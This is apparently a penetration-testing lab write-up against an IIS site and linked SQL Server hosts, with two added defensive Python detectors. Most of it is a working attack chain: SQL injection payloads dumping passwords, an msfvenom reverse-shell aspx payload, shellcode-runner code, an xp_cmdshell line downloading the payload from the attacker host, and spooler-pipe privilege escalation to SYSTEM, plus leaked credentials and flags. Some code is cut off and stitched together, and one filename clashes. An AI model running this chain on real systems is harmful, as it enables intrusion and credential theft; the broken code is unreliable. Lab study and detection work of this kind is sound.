Lab 2
192.168.X.140
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| ASPSESSIONIDCCTQQRBR:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Music Inventory
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: SQL11
| NetBIOS_Domain_Name: SQL11
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: sql11
| DNS_Computer_Name: sql11
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-02-07T09:11:12
|_Not valid after: 2051-02-07T09:11:12
|_ssl-date: 2021-02-07T09:43:54+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL11
| NetBIOS_Domain_Name: SQL11
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: sql11
| DNS_Computer_Name: sql11
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-07T09:43:49+00:00
| ssl-cert: Subject: commonName=sql11
| Not valid before: 2021-02-06T09:10:35
|_Not valid after: 2021-08-08T09:10:35
|_ssl-date: 2021-02-07T09:43:54+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
192.168.X.141
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: SQL27
| NetBIOS_Domain_Name: SQL27
| NetBIOS_Computer_Name: SQL27
| DNS_Domain_Name: sql27
| DNS_Computer_Name: sql27
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-02-07T09:11:56
|_Not valid after: 2051-02-07T09:11:56
|_ssl-date: 2021-02-07T09:46:13+00:00; -25s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL27
| NetBIOS_Domain_Name: SQL27
| NetBIOS_Computer_Name: SQL27
| DNS_Domain_Name: sql27
| DNS_Computer_Name: sql27
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-07T09:46:07+00:00
| ssl-cert: Subject: commonName=sql27
| Not valid before: 2021-02-06T09:11:18
|_Not valid after: 2021-08-08T09:11:18
|_ssl-date: 2021-02-07T09:46:13+00:00; -25s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
192.168.X.142
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: SQL53
| NetBIOS_Domain_Name: SQL53
| NetBIOS_Computer_Name: SQL53
| DNS_Domain_Name: sql53
| DNS_Computer_Name: sql53
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-02-07T09:11:06
|_Not valid after: 2051-02-07T09:11:06
|_ssl-date: 2021-02-07T10:11:14+00:00; -51s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL53
| NetBIOS_Domain_Name: SQL53
| NetBIOS_Computer_Name: SQL53
| DNS_Domain_Name: sql53
| DNS_Computer_Name: sql53
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-07T10:11:11+00:00
| ssl-cert: Subject: commonName=sql53
| Not valid before: 2021-02-06T09:10:30
|_Not valid after: 2021-08-08T09:10:30
|_ssl-date: 2021-02-07T10:11:14+00:00; -51s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Then we find out that it’s the first column that is vulnerable:
' union select @@version,2; --
Gives: Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24 2019 13:48:23 Copyright (C) 2019 Microsoft Corporation Express Edition (64-bit) on Windows Server 2019 Standard 10.0 (Build 17763: ) (Hypervisor)
' union select name,2 from syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users')--
gives:
Song name: id - From the year: 2
Song name: name - From the year: 2
Song name: pass - From the year: 2
So we have:
Admin:123pass123
Alice:dfdg34fdsf3
Brett:mypassword
Eric:mypassword
Peter:password
Tried some PowerShell reverse shell with AMSI but it doesn’t work. Maybe constrained language mode is blocking me.
Then I can upload an aspx file to the webroot and trigger it from the browser, so we do:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.X.Y LPORT=443 -f aspx -o 3.aspx
Then I open the aspx and add encryption to it. So we first use this Caesar encrypt helper:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace CaesarEncrypt
{
    class Program
    {
        // P/Invoke declarations belong at class level, not inside Main
        [System.Runtime.InteropServices.DllImport("kernel32")]
        private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);

        [System.Runtime.InteropServices.DllImport("kernel32")]
        private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);

        static void Main(string[] args)
        {
            byte[] buf = new byte[685] { shellcodeHere };
Then we add the Caesar decryption routine after the encrypted shellcode.
Then we run:
'; EXEC master.dbo.xp_cmdshell "powershell.exe iwr -uri http://192.168.X.Y/3.aspx -o C:\inetpub\wwwroot\3.aspx";--
Then to trigger it, we go to: http://192.168.X.140/2.aspx
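Added here as a defender's-side example, not part of the lab notes: a small Python detector that runs a W3C-format IIS access log through the indicators visible in the injections above (UNION SELECT with @@version, sysobjects/syscolumns enumeration, and the stacked xp_cmdshell call). The log lines, the /search.asp path and the client address are constructed; IIS only records GET query strings this way, so a POST-based form needs request-body logging or a WAF log instead.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log (not from the lab): one benign search, then the
# write-up's three payloads URL-encoded the way IIS stores cs-uri-query.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-02-07 09:50:01 192.168.0.140 GET /search.asp q=beatles 80 - 192.168.0.7 Mozilla/5.0 - 200 0 0 15
2021-02-07 09:51:12 192.168.0.140 GET /search.asp q=%27+union+select+%40%40version%2C2%3B+-- 80 - 192.168.0.7 Mozilla/5.0 - 200 0 0 31
2021-02-07 09:52:40 192.168.0.140 GET /search.asp q=%27+union+select+name%2C2+from+syscolumns+WHERE+id+%3D+%28SELECT+id+FROM+sysobjects+WHERE+name+%3D+%27users%27%29-- 80 - 192.168.0.7 Mozilla/5.0 - 200 0 0 47
2021-02-07 10:02:03 192.168.0.140 GET /search.asp q=%27%3B+EXEC+master.dbo.xp_cmdshell+%22powershell.exe+iwr+-uri+http%3A%2F%2F192.168.0.7%2F3.aspx+-o+C%3A%5Cinetpub%5Cwwwroot%5C3.aspx%22%3B-- 80 - 192.168.0.7 Mozilla/5.0 - 500 0 0 1203
"""

# Each indicator is one signal; find_sqli alerts only when several coincide.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S),
    "version_probe": re.compile(r"@@version", re.I),
    "schema_enum": re.compile(r"\b(sysobjects|syscolumns|information_schema)\b", re.I),
    "cmd_exec": re.compile(r"\bxp_cmdshell\b", re.I),
    "stacked_query": re.compile(r"'\s*;"),
    "comment_trailer": re.compile(r"--\s*$|/\*"),
}

def parse_w3c(text):
    """Turn W3C extended log text into dicts keyed by the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def score_request(row):
    """Decode the query string once and return the indicator names it trips."""
    decoded = unquote_plus(row.get("cs-uri-query", "-"))
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)], decoded

def find_sqli(text, min_hits=2):
    """Alert on requests tripping at least min_hits indicators (one alone is noisy)."""
    alerts = []
    for row in parse_w3c(text):
        hits, decoded = score_request(row)
        if len(hits) >= min_hits:
            alerts.append({"time": f"{row['date']} {row['time']}", "client": row["c-ip"],
                           "uri": row["cs-uri-stem"], "hits": hits, "query": decoded})
    return alerts
```

The same indicator table can be pointed at a live log file with `find_sqli(open(path).read())`; raise min_hits if a legitimate search form lets users type SQL-looking text.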
To priv esc, I need an exe that can give me an msf session. So let’s create this:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace gimmeshell
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        [DllImport("kernel32.dll")]
        static extern void Sleep(uint dwMilliseconds);

            return xored;
        }
    }
}
}
c:\windows\tasks\Print.exe \\.\pipe\test\pipe\spoolss
Then Ctrl+Z
Then in meterpreter, type shell to get into a new channel
Then run: c:\windows\tasks\SpoolSample.exe sql11 sql11/pipe/tests
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function
Then Ctrl+z
Then channel -i 4 (this was the channel id when we did ctrl+z above)
Then we see:
Found sid S-1-5-18
Impersonated user is: NT AUTHORITY\SYSTEM
more c:\users\administrator\desktop\proof.txt
59f136d2fd6f609a3c3e3698b51e0524 (admin on SQL11 machine)
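Added here as a defender's-side example, not from the lab notes: the Print.exe step above creates a named pipe whose name ends in \pipe\spoolss but sits under an extra path component, then coerces the real spooler into connecting to it. The Python below runs that pattern over constructed Sysmon-style pipe events (EventID 17 PipeCreated, 18 PipeConnected); the PipeName/Image/User field layout and the records themselves are assumed, not captured from the lab.

```python
import re

# Constructed Sysmon-style pipe events (not captured from the lab).
# EventID 17 = PipeCreated, 18 = PipeConnected. Sysmon records the pipe
# name without the \\.\pipe prefix, so \\.\pipe\test\pipe\spoolss from the
# write-up shows up as \test\pipe\spoolss.
EVENTS = [
    {"EventID": 17, "PipeName": r"\spoolss",
     "Image": r"C:\Windows\System32\spoolsv.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 17, "PipeName": r"\test\pipe\spoolss",
     "Image": r"C:\Windows\Tasks\Print.exe", "User": r"IIS APPPOOL\DefaultAppPool"},
    {"EventID": 18, "PipeName": r"\test\pipe\spoolss",
     "Image": r"C:\Windows\System32\spoolsv.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 17, "PipeName": r"\spoolss",
     "Image": r"C:\Users\Public\svc.exe", "User": r"SQL11\sqlsvc"},
    {"EventID": 17, "PipeName": r"\sql\query",
     "Image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
]

# The genuine spooler pipe is exactly \spoolss and is owned by spoolsv.exe.
SPOOLER_IMAGE = re.compile(r"\\spoolsv\.exe$", re.I)
# A spoolss pipe nested under another path component is the coercion pattern.
NESTED_SPOOLSS = re.compile(r"^\\.+\\pipe\\spoolss$", re.I)

def classify(ev):
    """Return a finding name for one event, or None if it looks benign."""
    name, image = ev["PipeName"], ev["Image"]
    if ev["EventID"] == 17:
        if NESTED_SPOOLSS.match(name):
            return "fake_spoolss_pipe_created"
        if name.lower() == r"\spoolss" and not SPOOLER_IMAGE.search(image):
            return "spoolss_pipe_from_non_spooler"
    elif ev["EventID"] == 18:
        # the real spooler connecting to a nested spoolss pipe means the coercion landed
        if SPOOLER_IMAGE.search(image) and NESTED_SPOOLSS.match(name):
            return "spooler_connected_to_fake_pipe"
    return None

def detect(events):
    """Run classify over a batch and keep only the findings."""
    return [(ev["Image"], ev["PipeName"], ev["User"], tag)
            for ev in events if (tag := classify(ev)) is not None]

if __name__ == "__main__":
    for image, pipe, user, tag in detect(EVENTS):
        print(f"{tag:32} {user:28} {image} -> {pipe}")
```

The creating account in the second event is the web app pool identity, which is exactly the class of service account that holds SeImpersonatePrivilege; pairing this rule with the preceding aspx drop into wwwroot gives the full chain in one timeline.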
In loginform.asp, we find:
ConnString="DRIVER={SQL Server};SERVER=localhost;UID=webapp11;PWD=89543dfGDFGH4d;DATABASE=music"
ComputerName : SQL11
Instance : SQL11\SQLEXPRESS
DomainName : WORKGROUP
ServiceProcessID : 3480
ServiceName : MSSQL$SQLEXPRESS
ServiceAccount : LocalSystem
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption :0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Express Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsMachineType : ServerNT
OSVersionName : Windows Server 2019 Standard
OsVersionNumber : SQL
Currentlogin : webapp11
IsSysadmin : Yes
ActiveSessions :1
Gives:
Version : SQL Server 2019
Instance : SQL11\SQLEXPRESS
CustomQuery :
Sysadmin : 1
Path : {SQL11\SQLEXPRESS}
User : webapp11
Links : {SQL27, SQL53}
Version :
Instance : Broken Link
CustomQuery :
Sysadmin :
Path : {SQL11\SQLEXPRESS, SQL27, SQL53}
User :
Links : {}
--------------------------------------------------------------------------------
43ee2d2866e4e2180b3ea72d9d10bce6
ComputerName : SQL27
Instance : SQL27\SQLEXPRESS
DomainName : WORKGROUP
ServiceProcessID : 3524
ServiceName : MSSQL$SQLEXPRESS
ServiceAccount : .\sqlsvc
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption :0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Express Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsMachineType : ServerNT
OSVersionName : Windows Server 2019 Standard
OsVersionNumber : SQL
Currentlogin : SQL27\sqlsvc
IsSysadmin : Yes
ActiveSessions :2
more proof.txt
3651616a6f9307b319311d167b19832a